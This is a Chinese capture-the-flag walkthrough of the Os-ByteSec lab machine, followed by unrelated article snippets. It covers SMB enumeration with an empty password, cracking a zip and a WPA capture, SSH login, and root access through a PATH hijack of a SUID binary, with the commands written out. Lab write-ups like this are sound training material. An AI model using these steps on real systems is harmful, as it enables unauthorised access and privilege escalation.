Os-ByteSec

Os-ByteSec

一、主机发现和端口扫描

  • 主机发现,靶机地址192.168.80.144

    在这里插入图片描述

  • 端口扫描,开放了80、139、445、2525端口

    在这里插入图片描述

二、信息收集

  • 访问80端口

    在这里插入图片描述

  • 路径扫描

    dirsearch -u "http://192.168.80.144/" -e *
    

    在这里插入图片描述

  • 访问扫描出来的路径,没有发现有价值的信息

    http://192.168.80.144/css/         
    http://192.168.80.144/gallery/    
    http://192.168.80.144/html/                                    
    http://192.168.80.144/img/        
    http://192.168.80.144/index.html                                     
    http://192.168.80.144/js/          
    http://192.168.80.144/news/
    
  • 在网站下边发现了一个提示,是不是暗示着对SMB进行渗透

    在这里插入图片描述

三、SMB渗透

  • SMB是一个网络协议名,它能被用于Web连接和客户端与服务器之间的信息沟通,它允许应用程序和终端用户从远端的文件服务器访问文件资源

  • 查询靶机中的用户信息

    enum4linux -U 192.168.80.144
    
    enum4linux是用于枚举windows和Linux系统上的SMB服务的工具。可以轻松的从与SMB服务有关的目标中快速提取信息
    

    在这里插入图片描述

  • 爆破用户smb密码,密码为空

    acccheck -t 192.168.80.144 -u smb -v
    

    在这里插入图片描述

  • 枚举靶机的共享资源

    smbmap -u 'smb' -p '' -H 192.168.80.144
    

    在这里插入图片描述

  • 查看靶机的共享目录

    smbclient -L 192.168.80.144 -U smb
    

    在这里插入图片描述

  • 通过SMB登录靶机

    smbclient //192.168.80.144/print$ -U smb
    

    在这里插入图片描述

  • 发现里面的文件全是0字节,但是发现了一个.目录,是不是指定smb用户的家目录呢,试一下

    smbclient //192.168.80.144/smb -U smb 
    

    在这里插入图片描述

  • 发现两个文件,其中main文件只有一个hello

    在这里插入图片描述

  • 将另一个文件下载下来

    在这里插入图片描述

四、密码破解

  • 尝试解压safe.zip,发现需要密码,爆破密码

    fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u safe.zip
    
    或者
    
    zip2john safe.zip > pass
    john pass
    
    密码hacker1
    

    在这里插入图片描述

    在这里插入图片描述

    在这里插入图片描述

  • 解压得到两个文件,secret.jpg和user.cap,图片没啥利用价值,使用wireshark打开user.cap文件进行分析,是个无线数据包,wifi名为blackjax,使用aircrack-ng破解user.cap文件,得到密码为snowflake

    aircrack-ng -w /usr/share/wordlists/rockyou.txt user.cap
    

    在这里插入图片描述

五、权限提升

  • 使用刚才得到的用户名密码登录ssh,得到第一个flag

    blackjax:snowflake
    ssh blackjax@192.168.80.144 -p 2525
    

    在这里插入图片描述

  • 该用户不能执行sudo

    在这里插入图片描述

  • 查看系统中带SUID的程序

    find / -user root -perm -4000 -print 2>/dev/null
    

    在这里插入图片描述

  • 其中netscan比较可疑,执行该命令

    在这里插入图片描述

  • 下载并分析该文件,发现它调用了execve函数执行了netstat -antp命令

    scp -P 2525 blackjax@192.168.80.144:/usr/bin/netscan /tmp
    
    strace -f /tmp/netscan
    

    在这里插入图片描述

    在这里插入图片描述

  • 通过劫持环境变量来让netscan在执行时执行其他命令

    # tmp有写权限
    echo "/bin/sh" > /tmp/netstat
    chmod 777 /tmp/netstat
    export PATH=/tmp:$PATH 
    netscan
    
  • 提权成功

    在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/161655.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

IO流-序列化流

一,序列化(把java对象写到对象中去) 二, Object OutputStream(对象字节输出流) 三,案例 package BigDecimal;import java.io.FileOutputStream; import java.io.ObjectOutputStream;public class Main {public static…

​软考-高级-系统架构设计师教程(清华第2版)【第14章 云原生架构设计理论与实践(P496~526)-思维导图】​

软考-高级-系统架构设计师教程(清华第2版)【第14章 云原生架构设计理论与实践(P496~526)-思维导图】 课本里章节里所有蓝色字体的思维导图

​软考-高级-系统架构设计师教程(清华第2版)【第13章 层次式架构设计理论与实践(P466~495)-思维导图】​

软考-高级-系统架构设计师教程(清华第2版)【第13章 层次式架构设计理论与实践(P466~495)-思维导图】 课本里章节里所有蓝色字体的思维导图

数据库的分库分表 详解

前言 一个系统随着用户量上升,产生的数据也越来越多,到达一定程度,数据库就会产生瓶颈。 首先单机数据库所能承载的连接数,io和吞吐量都是有限的,并发量上来数据库就渐渐顶不住了。 如果单表的数据量过大&#xff0…

阿里巴巴java开发手册-编程规约

编程规约 命名风格常量定义代码格式OOP 规约日期时间集合处理并发处理控制语句注释规约前后端规约其他 命名风格 【强制】代码中的命名均不能以下划线或美元符号开始,也不能以下划线或美元符号结束。 反例:_name / name / n a m e / n a m e / n a m e…

腾讯云服务器租用价格,腾讯云服务器价格流量怎么算?

首先,让我们来看看腾讯云服务器租用价格。根据您的需求不同,腾讯云提供了多种不同的配置选项,从轻量级应用服务器到高性能的GPU服务器,都可以满足您的需求。以下是一些常见的腾讯云服务器租用价格: 一、腾讯云服务器租…

vs2017 编译Qt 5.11.2 源码

SDK 10.0.22000.194 有 2种编译方式 ,第二种 看下面 方式一: 1、问题描述: 使用VS编译程序时,运行库选择多线程(/MT),表示采用多线程静态release的方式进行编译。 但是,发现编译是不能通过的…

使用 Filebeat+Easysearch+Console 打造日志管理平台

近年来,日志管理平台越来越流行。使用日志管理平台可以实时地、统一地、方便地管理和查看日志,挖掘日志数据价值,驱动运维、运营,提升服务管理效率。 方案架构 Beats 是轻量级采集器,包括 Filebeat、Metricbeat 等。E…

记一次服务器配置文件获取OSS

一、漏洞原因 由于网站登录口未做双因子校验,导致可以通过暴力破解获取管理员账号,成功进入系统;未对上传的格式和内容进行校验,可以任意文件上传获取服务器权限;由于服务器上配置信息,可以进一步获取数据库权限和OSS管理权限。二、漏洞成果 弱口令获取网站的管理员权限通…

资产设备管理系统

dtAsset 是一个固定资产设备管理系统,它专为中小企业的需求而设计。该软件提供了对常用资产设备进行信息化管理的功能,并支持自定义设备类型、导入导出数据、维护工作统计、采购管理、文档管理、运维监控 (使用 Zabbix)、知识库等功能。 主要模块 1.系统…

ogrinfo不是内部或者外部命令

这个是GDAL的问题,我是通过OSGeo4w安装的,出来就是这个问题,教程没有仔细看干。 第一次安装,选择express install!!!! 第一次安装,选择express install!&…

动手学深度学习——循环神经网络的简洁实现(代码详解)

文章目录 循环神经网络的简洁实现1. 定义模型2. 训练与预测 循环神经网络的简洁实现 # 使用深度学习框架的高级API提供的函数更有效地实现相同的语言模型 import torch from torch import nn from torch.nn import functional as F from d2l import torch as d2lbatch_size, …

黑马程序员 学成在线项目 第1章 项目介绍环境搭建v3.1

第1章 项目介绍&环境搭建v3.1 1.项目背景 1.1 在线教育市场环境 以下内容摘自艾瑞:2020年在线教育行业洞察:To B赛道篇_网络服务_艾瑞网 在线教育行业是一个有着极强的广度和深度的行业,从校内到校外;从早幼教到职业培训&…

【Python】逆向与爬虫的故事

目录 一、前言 二、爬虫 1、什么是爬虫? 2、Python 爬虫的主要工具 3、爬虫的基本流程 4、实例代码 三、逆向 1、什么是逆向? 2、Python 逆向的主要工具 3、逆向的基本流程 4、实例代码 四、总结 一、前言 随着互联网技术的发展&#xff0c…

RIP路由信息协议

RIP路由信息协议(Routing Information Protocol) 最先得到广泛应用的协议,最大优点是简单要求网络中的每个路由器都要维护一张表,表中记录了从它自己到其他每一个目的网络的距离RIP是应用层协议,它在传输层使用UDP,RIP报文作为UD…

2023.11.18 - hadoop之zookeeper分布式协调服务

1.zookeeper简介 ZooKeeper概念: Zookeeper是一个分布式协调服务的开源框架。本质上是一个分布式的小文件存储系统 ZooKeeper作用: 主要用来解决分布式集群中应用系统的一致性问题。 ZooKeeper结构: 采用树形层次结构,没有目录与文件之分,ZooKeeper树中的每个节点被…

HDMI之EDID析义篇

DisplayID Type X Video Timing Data Block 实例 F0 2A 10 93 FF 0E 6F 08 8F 10 93 7F 07 37 04 8F 10该数据来源于SHARP AQUOS-TVE23A 4K144Hz电视机的第3个EDID块(基于HF-EEODB)。 定义 解释 VTDB 1: 3840x2160 144.000009 Hz 16:9 333.216 kHz 1343.527000 MHz (RBv3,h…

STM32 HAL库函数HAL_SPI_Receive_IT和HAL_SPI_Receive的区别

背景 前段时间开发一个按键板驱动,该板用的STM32F103系列单片机,前任工程师用STM32CubeMX生成的工程,里面全是HAL库调用,我接手后,学习了下HAL库的用法,踩坑不少,特别是带IT后缀的函数&#xf…

深入了解Java 8 新特性:lambda表达式进阶

阅读建议 嗨,伙计!刷到这篇文章咱们就是有缘人,在阅读这篇文章前我有一些建议: 本篇文章大概7000多字,预计阅读时间长需要10分钟。本篇文章的实战性、理论性较强,是一篇质量分数较高的技术干货文章&#…